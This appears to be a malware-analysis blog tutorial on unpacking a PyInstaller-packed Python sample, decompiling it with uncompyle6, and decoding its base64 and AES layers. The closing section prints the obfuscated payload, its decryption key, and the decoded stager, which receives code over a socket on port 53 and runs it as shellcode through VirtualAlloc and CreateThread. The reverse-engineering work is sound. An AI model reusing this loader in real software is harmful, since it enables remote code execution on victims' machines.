De-obfuscating PyInstaller Malware

the image above depicts the pyinstaller icon, which can be used to recognise exe files packaged with pyinstaller
the image above depicts the pyinstaller icon, which can be used to recognise exe files packaged with pyinstaller

What is pyinstaller?

PyInstaller is a tool used to package up python scripts and all their required libraries inside of an exe, which can be launched without needing to install python or any other requirements. It does this by packaging a python DLL inside of itself, along with compiled versions of python files and libraries.

Malware authors sometimes use this as a method of obfuscation or to try and avoid detection by AV

However, these exe files, or "PE files" can be converted back into their original source code for analysis, and that's what we'll be doing today

Recognising pyinstaller packed PE files

  • Most PE files packed with pyinstaller will have the icon shown above
  • Run floss or strings on your PE file and you will see references to python27.dll, or python[xx].dll where xx is a python version number. There will also be references to at least one .pyd, .pyz, or .pyc file. Additionally you might see strings like 'Error extracting' or 'Failed to execute script'
Despite containing a python .dll file, as well as a number of compressed resources, these objects won't necessarily show up in many of your favourites tools. But chuck your payload into a text editor, scroll to the bottom, and sure enough you'll find references to python


Your first step is going to be to extract the contents of your pyinstaller packaged exe, which are compressed with the zlib library and stored as resources. We could probably create a small script to do this for us, but luckily one already exists

The library referenced above, pyinstxtractor, can be installed using pip install pyinstxtractor which worked for me. However, I was not able to reference the extractor from commandline like I expected, so I ended having to run git clone and run the from that folder.

The script can be ran with the simple syntax python your_file.exe and if successful will spit out a folder named your_file.exe_extracted


To show how this works, I'll perform the process on some python based malware packed with pyinstaller (which I've cleverly named 'payload.exe')

the script can be ran easily from command line with no arguments
the script can be ran easily from command line with no arguments
the output folder from our tool
the output folder from our tool

Our extracted folder contains a number of items, including dll libraries, pyd libraries, and manifest files. However, all we care about is the .pyc files


pip install uncompyle6

You may notice that these pyc files that you've extracted are not human readable when you open them up in a code editor

pyc files when viewed in a text editor
pyc files when viewed in a text editor

That's because these are "pycache" files, essentially our python stored in the state between code, and execution in the interpreter. We don't need to know exactly how this works but we do need to know how to "decompile" these back into human readable python code.

Uncompyle6 can be installed with a simple pip install uncompyle6 and, once installed, can be used via the commandline alias uncompyle6

Important things to note when using this tool:

  • You must run uncompyle6 with the version of python that the pyc file was compiled with, or you may experience errors
for example, running the tool against our sample using python 3.10 gives us a 'bad marshal data' error, as this payload was made with a much older version of python
for example, running the tool against our sample using python 3.10 gives us a 'bad marshal data' error, as this payload was made with a much older version of python
  • You can run this against your whole extracted folder and output the decompiled files using this command uncompyle6 -r extracted_folder -o output_folder
  • You can use --verify to verify each decompilation attempt. Unverified or failed attempts will be outputted with a _unverified or _failed suffix

Running the tool

I'll be using our extracted files as an example of how this tool works. See uncompyle6 in action below running under python 2.7 in order to extract a pyc file compiled in python 2.7 (Minor version 62211)


Deobfuscating our payload

For the purposes of explaining how to extract pyinstaller malware, we're done, but as an example of what python malware like this may look like, we can debobfuscate our decompiled code

from Crypto.Cipher import AES as mEujv
from base64 import b64decode as ZCwNK

We can see that our payload imports the b64decode function from the base64 python library and renames it to ZCwNK

The payload then uses this function to decode a base64 string and passes it into an exec() function, which executes the decoded text as more python

To see what code is beinge executed, we can use a simple trick of replacing our exec() call with a print() function instead. This will print our decoded python code to the screen instead of executing it.

We can tidy the output up by adding a .decode("utf-8", "ignore") to convert the byte array that b64decode spits out into a utf-8 string. This won't change the output much but it will make it a bit more human readable

from Crypto.Cipher import AES as mEujv
from base64 import b64decode as ZCwNK

We can see that our output is more of the same, but this time instead of just decoding some base64, we have an added layer of obfuscation. This time, the output of the base64 decode function, is passed into a .decrypt() function call. Going back to our original script we can see that the AES utility is actually imported from Crypto.Cipher as mEujv

This time, we can simply replace our exec() with a print() and add our trust .decode("utf-8", "ignore") to print out the result of this decoding/decryption. However, we also need to move the .rstrip("{") to the end of our decryption output, and add a .decode("utf-8", "ignore") inbetween to make it work.

print("dli8rK(n7&^@|cxC#JzvWHliH9dp2OB9").decrypt(ZCwNK("2RhowUdCq9o8TvWpEEh6IrTjadgCaVAQqvrZPQnwSJLnzFHC0TFzNf5ULyqBdqscGtgQtRp9ALM3NNGLFgeAPUXZaXRzMdDq9G0c388Z9fKOxI/1641/+HMzb5mgaliMJMMqlx2lxf0RXjX5GU5vcLJcwnEJcd03zcpuuXzih1soTbGC6Uh/N049MJ14yNs401uQoMFujfRTuqiz4d+e3wG6VUBoYkz7IazE7XAyOxEziatTuJ9DogrSvUPqTzLo2PcNoIG+pbxfpSp1a9i8fCHOfmjOwwwCNvv/OBjy6q4Jt2Cc8CDdFGeQ5a/d8dEyeNEXo65hHGlsg/2vuuEQTh1eNIVlrFlF98z0RL+aegfZZKlp2C/2n2e0fgaumINJMBJ6hPpHwovAIFyClyHiXYxHMZuAv1WZ9QhaNW1CK/VCIceQ+6k3uXA1mnWVen56uCPhzWpYCreGC847K/KfJHkQvbMgoJqx5th2naJxIrT8XcAmXdY1nOtEnADueY+dT+ahMvNEO9G9KhZkeI710/hMFWgXVQAfSAfAHs+6eN3G+qr4wTVSuVdQVKFVuLxFbacMl2081C7qbv83yI+c6m1jcUdfdtgXdGv4WB202TZjXyKxybgHVBBVVZO+1qzwXgmK9yW2jQaqK2PrAQMVyZCwtIc7R9Y20ShrwFlyS+cKNJYFVEgxeFVe3GiKMKl+1K1m/0A9fswDnvecjGG3Mroc1kAbDql1BksBFtnxAEN9zweOtmUorp71ewJ8+utPLN6j8XcammpEf6XocISHpbOXS+2EFUixyLHYqyekY+t323Oi8EnM3phz/W9GhcM8lWw2O5gyHD4p+Fp17VwSgSIIr8ppFnw8E2YMkPQUygGeZdO7rFBqwCJ3Pj/1mmhP70EkRBfq6wzVIw4DwoP68xHt5zKkHsA4Xrj3byOJxqbO5POJ/qtKOOwK428dWVnoZUw5IMv7aIawRulNU9DTxZGJ0dJh58GGD57SCVOcQr6FRnVrDCTE8RAVO77OvsD1Ty/+GSywnaiyRY0JPVQLagaiW9f+Ugm0Bkq423l0q1qb6+R8uvaMXp7ShP+Fm/n+5kYG/6Wt8dAl0riR6Zpe3HJS9RIinPi3XyVrwPXnGGjlP2Q5qP8ILyu8rR4UrwQQjj3dhAs7ZZ5Ml4IwuWalscKec0EfsEF6QzKG5/pzxX2FRnVrDCTE8RAVO77OvsD1q++L8hIpthUcZfvnvGEBCrpa+rdHS/iCij8CNQ+EefxFOjTyV+EznHtwEcJn2afMY6HImXkbjvAIVX+QU6rAkaF1cr4n/KSYeHnAdgt4NNqHe5yyTBfxYRaSYVbtC1Hqml0zf//GRZLsxl7mINh6hs7k84n+q0o47Arjbx1ZWehnYlghISe0tPcPOu4dhAAyjj3dhAs7ZZ5Ml4IwuWalsXmEbfADlvlwnS3usMoI8kikz4pS4qGyvrP+g3IC+xW8AwD0uRbB6trRp0dDtnlys+q7vPuXGl0kA7lxi7+bxl/1Qmec8R93q8hBWUa4IoDXbtKCYO2hhQlkA5JPhPYeBtHsnd7FDpo76rqRKdcpQKfFZdh++jzQbqPRZltyuaj5xWXYfvo80G6j0WZbcrmo+b/59d+btzjbgtvnDgZubB74Zzyw1ipekyKIZXLP6/ODUjs644jnIvxfKdvqmrr7RlI7OuOI5yL8Xynb6pq6+0a9Rns0Ut3cMxhf52TG/Beq9YGadLUbH+W47QGiA1Je14iFFI1ijE/MNw4BfKriKcN7jWV1TukDizUcJC1R2F7A8ppkbx2x/70EOmPkWXgGUtYqXoXB8t61dPxE16L2rgSRXhEOm26rGynVtp/ADkAiwmu3I77qL0aqGLTPeZ/nvcqIOKRD8YTE/uV3I6A6px5P/S9FuVzTpaNq7TFW/k7A")).decode("utf-8", "ignore").rstrip('{'))

This will print out the following code:

mxaatTo, skZlYlWgCv = None, None
def DqGPRjpMU():
		global skZlYlWgCv
		skZlYlWgCv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
		skZlYlWgCv.connect(('', 53))
		JvXlwZZDAq = struct.pack('<i', skZlYlWgCv.fileno())
		l = struct.unpack('<i', str(skZlYlWgCv.recv(4)))[0]
		gkZJOhEcng = "     "
		while len(gkZJOhEcng) < l: gkZJOhEcng += skZlYlWgCv.recv(l)
		CYdhMbqx = ctypes.create_string_buffer(gkZJOhEcng, len(gkZJOhEcng))
		CYdhMbqx[0] = binascii.unhexlify('BF')
		for i in xrange(4): CYdhMbqx[i+1] = JvXlwZZDAq[i]
		return CYdhMbqx
	except: return None
def JumwoufCojnuNhJ(SwEfMXULIc):
	if SwEfMXULIc != None:
		hHgmsQXisWqtJQD = bytearray(SwEfMXULIc)
		BuaqjQwrhsINzMJ = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(hHgmsQXisWqtJQD)),ctypes.c_int(0x3000),ctypes.c_int(0x40))
		ctypes.windll.kernel32.VirtualLock(ctypes.c_int(BuaqjQwrhsINzMJ), ctypes.c_int(len(hHgmsQXisWqtJQD)))
		ObnnzmHpSzgpY = (ctypes.c_char * len(hHgmsQXisWqtJQD)).from_buffer(hHgmsQXisWqtJQD)
		ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(BuaqjQwrhsINzMJ), ObnnzmHpSzgpY, ctypes.c_int(len(hHgmsQXisWqtJQD)))
		ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(BuaqjQwrhsINzMJ),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))
mxaatTo = DqGPRjpMU()

This looks more like the meat of our malware, with references to the Windows API littered throughout, as well as calls to socket, which allows low level network functionality.

If we break this malware down line by line we can see that it does the following:

  • Creates a function named DqGPRjpMU that creates a network socket and listens for data from a local network address over port 53, decodes it from hex, then returns the result
  • Creates a function that allocates memory using the Windows API, loads whatever data is given to it into memory, and executes it as shellcode using kernel32.CreateThread()
  • Passes the output of the first function into the second, to receive data from an internal IP, and then launch the data received as shellcode

Therefore, we can make a fair assumption that this is a beacon of sorts, that can receive and execute code from a command and control node (in this case another internal network location)